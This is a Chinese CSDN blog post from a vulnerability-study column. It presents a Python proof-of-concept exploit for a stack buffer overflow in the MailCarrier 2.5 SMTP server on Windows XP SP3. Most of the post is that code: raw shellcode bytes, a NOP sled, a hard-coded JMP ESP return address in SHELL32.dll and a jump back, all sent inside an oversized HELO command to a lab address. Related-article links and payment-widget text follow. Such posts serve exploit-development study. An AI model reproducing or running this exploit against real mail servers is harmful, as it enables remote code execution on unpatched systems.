mailcarrier25 EMAIL程序 典型覆盖返回地址XPSP3

最新推荐文章于 2019-09-26 18:09:46 发布
最新推荐文章于 2019-09-26 18:09:46 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/23476805
版权

软件名称:  mailcarrier25

环境:  XP SP3  正常情况下

发现一般都会有检测字符串,要构造攻击还是有点难度的····

E-MAIL 程序, 无验证登陆 发送消息

熟悉  SMTP 协议指令



python poc:

import struct
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
shellcode =(
'\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B'
'\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20'
'\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E'
'\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01'
'\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE'
'\x49\x07\x31\xC0\x51\x50\xFF\xD7')#108 bytes

buffer =   shellcode +'\x90'*(5094-108)+ ('\xb3\x9a\xd0\x7d')+('\xe9\x11\xec\xff\xff\x90')
#must have ()
#Found  JMP ESP at 0x7dd09ab3     Module:  C:\WINDOWS\system32\SHELL32.dll

try:
	s.connect(('10.10.10.130',25))
	s.send('HELO ' + buffer + '\r\n')
	h = s.recv(1024)
	print h
	s.close()
except:
	print 'could not connect to SMTP!'

















pandamac
关注
专栏目录
0day学习笔记(3)--修改函数返回地址
lonmar的博客
02-09 245
环境: devc++(编译改为32位),windows10
Heap Spray原理浅析
热门推荐
magictong的专栏
03-24 3万+
Heap Spray原理浅析 Magictong 2012/03   摘要:本文主要介绍Heap Spray的基本原理和特点、以及防范技术。 关键词:Heap Spray、溢出攻击、漏洞利用、堆溢出   Heap Spray定义基本描述 Heap Spray并没有一个官方的正式定义,毕竟这是漏洞攻击技术的一部分。但是我们可以根据它的特点自己来简单总结一下。Heap Spray是在sh
黑客攻防入门(二)shellcode构造
不断攀登
07-28 1万+
1. 概说shell我们都知道是什么了吧! 狭义的shellcode 就是一段可以运行shell的代码!构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode地址覆盖掉正常的返回地址shellcode通常放在缓冲区内,也可以通过环境变量存入堆内,也可以通过动态内存放入堆区。下面我们学习一下怎样构造shellcode。 注意: 我是在Centos 64位的系统下进行测试和构
原版XP SP3安装程序集成识别SATA的AHCI驱动的解决方法
linjcai的博客
08-22 1万+
一、问题的提出 现在的计算机硬件,基本以SATA硬盘为主要的工作硬盘, 那么主板基本以适应SATA的AHCI模式为主,那原来广为 应用的XP系统原版安装盘直接成了摆设,要正确安装还
VMware 安装windows XP SP3 镜像下载地址 回忆xp经典
hu27
04-11 2万+
链接:https://pan.baidu.com/s/1pJHDfnLL1EVx26vf3JOYNQ 提取码:1yhv 复制这段内容后打开百度网盘手机App,
iis6.0完整安装包xp+iis 6.0 完整安装包 xp sp3
09-17
iis6.0完整安装包xp+iis 6.0 完整安装包 xp sp3 IIS 6.0 中的一个最重要的变动涉及 Web 服务器安全性。为了更好地预防恶意用户和攻击者的攻击,在默认情况下,没有将 IIS 安装在 Microsoft Windows Server 2003 ...
XP SP3 SNMP服务自动安装包
01-19
标题 "XP SP3 SNMP服务自动安装包" 指的是一个专门为Windows XP Service Pack 3 (SP3) 用户设计的简单网络管理协议(SNMP)服务安装程序。SNMP是Internet标准协议,用于网络设备(如路由器、交换机、服务器等)的...
IIS_XPSP3 FOR microsoft windows XP professional版本2002 Service pack 3
07-08
在本案例中,"IIS_XPSP3 FOR Microsoft Windows XP Professional 版本2002 Service Pack 3" 指的是针对Windows XP Professional系统,版本号为2002,已经安装了Service Pack 3(SP3)的IIS服务。Service Pack是微软...
Windows XP SP3系统 IIS 5.1版本下载和IIS 5.1版本安装步骤说明
05-04
Windows XP Service Pack 3(SP3)是微软发布的Windows XP操作系统的一个重要更新,它包含了大量的安全更新和性能改进。而IIS(Internet Information Services)是微软提供的一个Web服务器软件,允许用户在自己的...
XPSP3 安装IIS文件包
04-23
XPSP3安装IIS的方法是:在“控制面板中”的--》“添加或删除程序”--》“添加/删除windows组件(A)”--》选择IIS服务。 安装时要用到此压缩包中的文件,用了一天的时间提取IIS所需的文件并测试通过的。
PWN-shellcode
MuMuLee_的博客
09-26 1839
构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode地址覆盖掉正常的返回地址。 题目: 1Ch=16+12=28,+esp=32:偏移量是32 能溢出:100-0x1c-4=68字节 C伪代码: 理论基础 函数返回步骤 : 保存返回值:函数返回值保存在EAX寄存器 弹出当前栈帧,恢复上一个栈帧 a) ESP + 当前栈帧大小:堆栈平衡基础上,降低栈顶,回收当前栈帧空间...
ImmunityDebugger 学习
zcc1414的专栏
03-12 6612
Immunity  Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以 及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为 强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融 合于一体,它还附带了一套高度可定制的纯python图形算法,可用于帮助我们绘 制出直观的函数体控制流以及函数中的各个基本块。 只是学习记录,别无
ASLR 基本概念
zcc1414的专栏
09-17 4317
ASLR (Address Space Layout Randomization) 通过加载程序时候不再使用固定的基址加载,从而干扰shellcode定位的一种保护机制 windows Vista出现后,ASLR 才真正开始发挥作用 VS2005 添加 /dynmicbase 就可以支持 ASLR VS2008 linker->Randomized Base Address 设置 包含
Ret2Libc学习NtSetInformationProcess DEP
zcc1414的专栏
09-15 3610
程序跳向非可执行代码上   DEP保护下溢出失败 Ret2libc (Return to libc) 原理  :   跳向一个已经存在的系统函数,DEP不会拦截 。 1) ZwSetInformationProcess函数将DEP关闭后再转入 shellcode执行 2)VirtualProtect 函数来将shellcode所在内存页设置为可执行,再转入shellcode执行 3)Vir
shellcode 进行加密原理
zcc1414的专栏
08-01 3226
shellcode 进行加密: #include "stdio.h" char popup_general[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x
matasploit+shellcode编码学习
zcc1414的专栏
03-16 3093
首先下面额指令都是我用到时记录的,可以说是经常用到吧 先找到memdump.exe文件: C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe 在CMD下 运行  memdump.exe 进程PID c:\abc 然后进入console 运行   msfpescan -p -m c:/abc
XP SP3系统文件保护关闭教程
"这篇内容提供了一种方法来彻底关闭Windows XP Service Pack 3 (XP SP3) 的系统文件保护功能,通常称为SFC (System File Checker) 或WFP (Windows File Protection)。这个过程涉及到对系统文件进行替换和修改,以使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值